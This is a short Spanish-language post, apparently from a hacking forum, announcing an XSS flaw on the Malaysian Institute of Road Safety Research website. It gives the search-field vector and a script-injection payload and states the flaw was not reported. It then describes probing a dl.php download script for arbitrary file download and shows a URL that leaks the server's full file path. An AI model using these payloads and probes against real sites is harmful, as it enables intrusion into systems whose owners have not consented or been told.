[XSS] Official Website of Malaysian Institute of Road Safety Research (MIROS)

• URL: https://www.miros.gov.my[/li]
  
• Vector: search[/li]
  
• Payload: x'"><script>alert(/Drok3r/)</script>[/li]
  
• Autor: Drok3r (redbirdTEAM, CiberSecurityRECON)[/li]
  
• Reportado: NO

¡Hola!

No indagué mucho, pero al principio parecía vulnerable a Arbitrary File Download, aunque no logro bypassear el filtro.
De todas formas, conseguí un FPD generando un error a la hora de utilizar el archivo "dl.php" provisto por ellos.
https://www.miros.gov.my/1/dl.php?filename=.
FPD: C:\xampp\htdocs\miros\1\dl.php

Saludos.